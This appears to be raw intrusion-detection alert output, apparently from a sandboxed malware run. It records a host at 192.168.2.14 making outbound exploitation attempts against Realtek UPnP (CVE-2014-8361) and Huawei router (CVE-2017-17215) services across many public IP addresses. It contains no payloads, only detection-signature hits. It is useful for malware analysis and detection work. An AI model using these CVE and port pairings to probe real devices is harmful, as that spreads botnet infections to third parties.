                                                07/20/24-23:05:52.554753TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24224052869192.168.2.1417.65.162.120
                                                07/20/24-23:06:32.673677TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5006652869192.168.2.14169.76.8.231
                                                07/20/24-23:05:38.957923TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5239237215192.168.2.1441.129.116.189
                                                07/20/24-23:05:55.889998TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3661037215192.168.2.14157.169.128.28
                                                07/20/24-23:06:10.935593TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4228852869192.168.2.14151.48.203.94
                                                07/20/24-23:05:58.084343TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5024652869192.168.2.1417.97.170.109
                                                07/20/24-23:06:15.174161TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614270252869192.168.2.14195.40.20.153
                                                07/20/24-23:05:35.567071TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3352052869192.168.2.14207.28.189.232
                                                07/20/24-23:05:35.355292TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614050652869192.168.2.1495.188.72.113
                                                07/20/24-23:05:40.326086TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5060452869192.168.2.1469.157.13.224
                                                07/20/24-23:05:45.403074TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5888437215192.168.2.14157.229.174.120
                                                07/20/24-23:06:11.138961TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24816452869192.168.2.14112.6.123.48
                                                07/20/24-23:05:57.591570TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3452652869192.168.2.1413.165.183.213
                                                07/20/24-23:05:47.044038TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4769237215192.168.2.14157.193.186.104
                                                07/20/24-23:05:48.266573TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614559852869192.168.2.1479.120.206.7
                                                07/20/24-23:05:59.845937TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5733852869192.168.2.1459.78.95.157
                                                07/20/24-23:05:35.945542TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613896652869192.168.2.14109.170.180.65
                                                07/20/24-23:06:24.232736TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26048252869192.168.2.14131.102.164.83
                                                07/20/24-23:05:46.447330TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5807852869192.168.2.14147.146.128.242
                                                07/20/24-23:05:48.783693TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4441837215192.168.2.1441.211.169.118
                                                07/20/24-23:05:56.086216TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3524037215192.168.2.14197.182.242.250
                                                07/20/24-23:05:59.335445TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5927652869192.168.2.14169.23.32.227
                                                07/20/24-23:06:02.064674TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615269052869192.168.2.1470.71.56.125
                                                07/20/24-23:05:33.861088TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3313237215192.168.2.14157.124.133.127
                                                07/20/24-23:05:36.325773TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4021237215192.168.2.14197.163.146.52
                                                07/20/24-23:05:52.459685TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4396252869192.168.2.14222.57.120.201
                                                07/20/24-23:05:58.066314TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4655852869192.168.2.14205.22.105.116
                                                07/20/24-23:05:46.135626TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5970837215192.168.2.1441.84.209.9
                                                07/20/24-23:06:00.170743TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3560252869192.168.2.14147.246.160.90
                                                07/20/24-23:05:57.575004TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4030252869192.168.2.14191.73.229.109
                                                07/20/24-23:06:02.872548TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25770452869192.168.2.14160.143.127.233
                                                07/20/24-23:06:12.943129TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5587052869192.168.2.1477.178.250.45
                                                07/20/24-23:06:02.066021TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614868052869192.168.2.1449.124.39.191
                                                07/20/24-23:05:50.554912TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4829037215192.168.2.1492.253.115.109
                                                07/20/24-23:06:01.909656TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24389852869192.168.2.1439.96.83.57
                                                07/20/24-23:05:35.201041TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5336652869192.168.2.14187.189.79.198
                                                07/20/24-23:05:42.131789TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3647637215192.168.2.1441.147.131.113
                                                07/20/24-23:06:38.097414TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4565652869192.168.2.14160.160.125.122
                                                07/20/24-23:05:45.414465TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4943837215192.168.2.1441.183.144.39
                                                07/20/24-23:06:29.180793TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3300452869192.168.2.14139.16.8.188
                                                07/20/24-23:05:40.347577TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5725052869192.168.2.1459.45.134.101
                                                07/20/24-23:05:50.533759TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5501237215192.168.2.14197.185.254.0
                                                07/20/24-23:05:35.286487TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4517252869192.168.2.14210.29.223.179
                                                07/20/24-23:06:11.377268TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615945452869192.168.2.1495.42.47.166
                                                07/20/24-23:07:08.369781TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25898852869192.168.2.14132.21.47.22
                                                07/20/24-23:05:35.938951TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3467452869192.168.2.14146.54.174.109
                                                07/20/24-23:06:03.064635TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4860052869192.168.2.14161.200.183.56
                                                07/20/24-23:05:40.369944TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4264852869192.168.2.14171.254.202.145
                                                07/20/24-23:05:52.485640TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4642252869192.168.2.1442.117.19.18
                                                07/20/24-23:05:35.966789TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613753252869192.168.2.14145.195.83.181
                                                07/20/24-23:06:21.839686TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614613652869192.168.2.14142.60.102.52
                                                07/20/24-23:06:14.251993TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5589852869192.168.2.1492.139.58.126
                                                07/20/24-23:05:40.462607TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5186452869192.168.2.14164.11.137.216
                                                07/20/24-23:06:04.880694TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4057652869192.168.2.14149.218.131.156
                                                07/20/24-23:06:29.188292TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23643052869192.168.2.14131.71.38.140
                                                07/20/24-23:05:36.532766TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3797837215192.168.2.1441.208.188.114
                                                07/20/24-23:05:57.133658TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4285252869192.168.2.1490.200.1.246
                                                07/20/24-23:05:36.323623TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5868437215192.168.2.14157.66.61.45
                                                07/20/24-23:05:47.044038TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3399037215192.168.2.14157.200.2.216
                                                07/20/24-23:06:01.572805TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3463252869192.168.2.1446.67.182.106
                                                07/20/24-23:06:27.648191TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3583652869192.168.2.14131.71.38.140
                                                07/20/24-23:06:29.529818TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5435652869192.168.2.14216.202.202.133
                                                07/20/24-23:05:59.472881TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5646852869192.168.2.1477.65.43.181
                                                07/20/24-23:06:43.717699TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4957852869192.168.2.14102.225.7.156
                                                07/20/24-23:06:01.207184TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5960252869192.168.2.1458.37.104.40
                                                07/20/24-23:06:34.776991TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5893452869192.168.2.1457.212.53.76
                                                07/20/24-23:05:50.531553TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3883437215192.168.2.14197.10.210.140
                                                07/20/24-23:05:59.827265TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5554052869192.168.2.14135.195.82.21
                                                07/20/24-23:05:33.830570TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5092637215192.168.2.1418.5.132.170
                                                07/20/24-23:05:38.950380TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4155237215192.168.2.14197.112.203.34
                                                07/20/24-23:05:39.223857TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614406252869192.168.2.1484.235.146.124
                                                07/20/24-23:05:58.758912TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25729652869192.168.2.14216.255.100.126
                                                07/20/24-23:06:05.139331TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615081452869192.168.2.14202.206.24.183
                                                07/20/24-23:05:36.343227TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5498237215192.168.2.1441.134.46.102
                                                07/20/24-23:05:42.221844TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5503037215192.168.2.14157.159.160.223
                                                07/20/24-23:05:59.262795TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613348452869192.168.2.1412.78.58.71
                                                07/20/24-23:05:42.226828TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5912637215192.168.2.14197.179.172.201
                                                07/20/24-23:06:01.373997TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613442652869192.168.2.14195.241.186.3
                                                07/20/24-23:06:01.951517TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6032252869192.168.2.1482.59.244.30
                                                07/20/24-23:05:57.781031TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615985252869192.168.2.1464.219.147.54
                                                07/20/24-23:06:15.036059TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25626452869192.168.2.1492.139.58.126
                                                07/20/24-23:05:46.119639TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5272637215192.168.2.1441.82.10.191
                                                07/20/24-23:06:22.140723TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613392652869192.168.2.14196.52.240.32
                                                07/20/24-23:05:50.571555TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4056437215192.168.2.14197.116.162.204
                                                07/20/24-23:07:04.503671TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615400852869192.168.2.1492.231.206.3
                                                07/20/24-23:05:48.795527TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4769237215192.168.2.14182.202.169.238
                                                07/20/24-23:05:36.534811TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4506037215192.168.2.14197.52.98.160
                                                07/20/24-23:05:39.054227TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3772837215192.168.2.14133.244.69.120
                                                07/20/24-23:05:58.772622TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26012452869192.168.2.1450.236.40.162
                                                07/20/24-23:06:03.808671TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4198052869192.168.2.14178.124.97.10
                                                07/20/24-23:05:58.087911TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5873852869192.168.2.14140.29.146.170
                                                07/20/24-23:05:59.429308TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5922652869192.168.2.14184.148.136.22
                                                07/20/24-23:05:40.462908TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5252852869192.168.2.14178.30.251.228
                                                07/20/24-23:06:03.282313TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4320652869192.168.2.14184.168.0.191
                                                07/20/24-23:05:57.584377TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615045452869192.168.2.1443.137.138.121
                                                07/20/24-23:05:34.657123TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6083837215192.168.2.14197.127.169.149
                                                07/20/24-23:06:01.660757TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4812252869192.168.2.14191.99.26.134
                                                07/20/24-23:05:34.657123TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3755237215192.168.2.1441.45.136.104
                                                07/20/24-23:06:01.188343TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615489652869192.168.2.1499.203.53.121
                                                07/20/24-23:05:39.165987TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3968652869192.168.2.1418.146.210.210
                                                07/20/24-23:05:56.430318TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3711037215192.168.2.14165.69.41.115
                                                07/20/24-23:05:37.517011TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6030652869192.168.2.1493.244.188.64
                                                07/20/24-23:05:38.971654TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4947837215192.168.2.14157.149.243.19
                                                07/20/24-23:06:26.022416TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25000452869192.168.2.1459.30.21.146
                                                07/20/24-23:05:39.935123TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615631252869192.168.2.1427.212.16.98
                                                07/20/24-23:05:39.938284TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3809652869192.168.2.1451.81.161.20
                                                07/20/24-23:05:35.206536TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615706652869192.168.2.14133.8.172.164
                                                07/20/24-23:05:40.426800TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25622852869192.168.2.1497.71.44.240
                                                07/20/24-23:05:38.911338TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615283452869192.168.2.14154.76.182.106
                                                07/20/24-23:06:35.526204TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5610252869192.168.2.14211.231.173.53
                                                07/20/24-23:05:40.339812TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3356652869192.168.2.14119.243.24.21
                                                07/20/24-23:05:38.944157TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3824637215192.168.2.1441.7.52.246
                                                07/20/24-23:05:38.709620TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614919252869192.168.2.1460.68.102.220
                                                07/20/24-23:05:40.322039TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4565852869192.168.2.14125.180.243.83
                                                07/20/24-23:05:45.386529TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3669037215192.168.2.14119.97.29.0
                                                07/20/24-23:05:46.101747TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3963437215192.168.2.1441.4.146.206
                                                07/20/24-23:05:36.048253TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614653252869192.168.2.14177.160.195.13
                                                07/20/24-23:05:59.996045TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5034452869192.168.2.14138.239.248.75
                                                07/20/24-23:05:36.324297TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5579837215192.168.2.1441.83.49.148
                                                07/20/24-23:06:01.464393TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4902852869192.168.2.14190.39.69.46
                                                07/20/24-23:06:02.963776TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3323252869192.168.2.14189.213.60.124
                                                07/20/24-23:06:03.235312TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3513052869192.168.2.14170.60.139.10
                                                07/20/24-23:05:36.325662TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4437837215192.168.2.14197.16.212.149
                                                07/20/24-23:05:44.998391TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616085052869192.168.2.1479.20.2.158
                                                07/20/24-23:05:56.038244TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3822037215192.168.2.14157.200.193.204
                                                07/20/24-23:05:46.338516TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613934852869192.168.2.1498.131.72.180
                                                07/20/24-23:07:31.562284TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4229652869192.168.2.14189.112.68.113
                                                07/20/24-23:05:47.997851TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3789652869192.168.2.14176.236.240.152
                                                07/20/24-23:05:35.871750TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3585652869192.168.2.14162.12.166.249
                                                07/20/24-23:06:01.881994TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613706252869192.168.2.1494.83.47.205
                                                07/20/24-23:05:39.518664TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614392252869192.168.2.1440.98.198.13
                                                07/20/24-23:06:01.641348TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615307852869192.168.2.14165.171.69.137
                                                07/20/24-23:05:52.504672TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5971252869192.168.2.1434.65.144.238
                                                07/20/24-23:05:34.656192TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5261637215192.168.2.14197.91.156.105
                                                07/20/24-23:06:27.119874TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614353652869192.168.2.14203.100.47.239
                                                07/20/24-23:05:45.437584TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4665037215192.168.2.1441.26.105.233
                                                07/20/24-23:05:35.467111TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3279652869192.168.2.1459.35.79.156
                                                07/20/24-23:05:58.900558TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23522052869192.168.2.1464.247.1.200
                                                07/20/24-23:05:33.853184TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5390637215192.168.2.14197.187.231.237
                                                07/20/24-23:05:56.772131TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4013452869192.168.2.14179.58.179.48
                                                07/20/24-23:06:32.540943TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5613052869192.168.2.1420.238.42.49
                                                07/20/24-23:05:35.297940TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5954452869192.168.2.1419.97.179.204
                                                07/20/24-23:05:59.809385TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4052252869192.168.2.14118.95.252.63
                                                07/20/24-23:06:06.631877TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5919037215192.168.2.14150.80.114.33
                                                07/20/24-23:05:45.376608TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6027037215192.168.2.14181.34.190.61
                                                07/20/24-23:05:37.456840TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23397652869192.168.2.1449.132.116.240
                                                07/20/24-23:05:47.044038TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4004437215192.168.2.1436.148.155.222
                                                07/20/24-23:06:56.877705TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3699252869192.168.2.1464.226.150.186
                                                07/20/24-23:06:13.365995TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4959652869192.168.2.14101.36.193.215
                                                07/20/24-23:06:02.998297TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613989652869192.168.2.14155.40.210.136
                                                07/20/24-23:06:26.155233TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4150852869192.168.2.14112.38.187.113
                                                07/20/24-23:05:36.329793TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3531237215192.168.2.14197.113.213.112
                                                07/20/24-23:05:52.525575TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23486452869192.168.2.1417.203.0.123
                                                07/20/24-23:05:40.455250TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24249252869192.168.2.14179.191.229.197
                                                07/20/24-23:06:03.387430TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4791237215192.168.2.14197.69.134.164
                                                07/20/24-23:06:02.733116TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614987652869192.168.2.1484.65.76.178
                                                07/20/24-23:06:23.035056TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5416652869192.168.2.1479.48.67.12
                                                07/20/24-23:05:35.520062TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614003452869192.168.2.14200.51.205.131
                                                07/20/24-23:05:45.466981TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3539237215192.168.2.1472.34.5.77
                                                07/20/24-23:07:03.190387TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613454252869192.168.2.14126.248.230.246
                                                07/20/24-23:06:03.476247TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3523237215192.168.2.1441.171.135.230
                                                07/20/24-23:06:05.412182TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613730252869192.168.2.14188.31.251.64
                                                07/20/24-23:06:53.637724TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614319852869192.168.2.14142.157.239.245
                                                07/20/24-23:06:35.012567TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4808052869192.168.2.1484.37.71.97
                                                07/20/24-23:06:27.523045TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615024652869192.168.2.14183.64.137.92
                                                07/20/24-23:06:14.487901TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5531852869192.168.2.14213.196.170.0
                                                07/20/24-23:05:37.457748TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3957452869192.168.2.1425.145.229.184
                                                07/20/24-23:05:56.088545TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4877437215192.168.2.14197.167.197.48
                                                07/20/24-23:06:15.983769TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26093452869192.168.2.14104.101.179.225
                                                07/20/24-23:05:58.403603TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614514252869192.168.2.14123.159.227.193
                                                07/20/24-23:05:59.316014TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6005052869192.168.2.1450.39.27.83
                                                07/20/24-23:06:17.635185TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4719452869192.168.2.14165.36.32.222
                                                07/20/24-23:06:12.981585TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613640252869192.168.2.1436.252.191.148
                                                07/20/24-23:06:00.486746TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24842452869192.168.2.14191.99.77.22
                                                07/20/24-23:06:02.911827TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5520852869192.168.2.14109.86.100.159
                                                07/20/24-23:05:35.304036TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614649052869192.168.2.14134.214.175.73
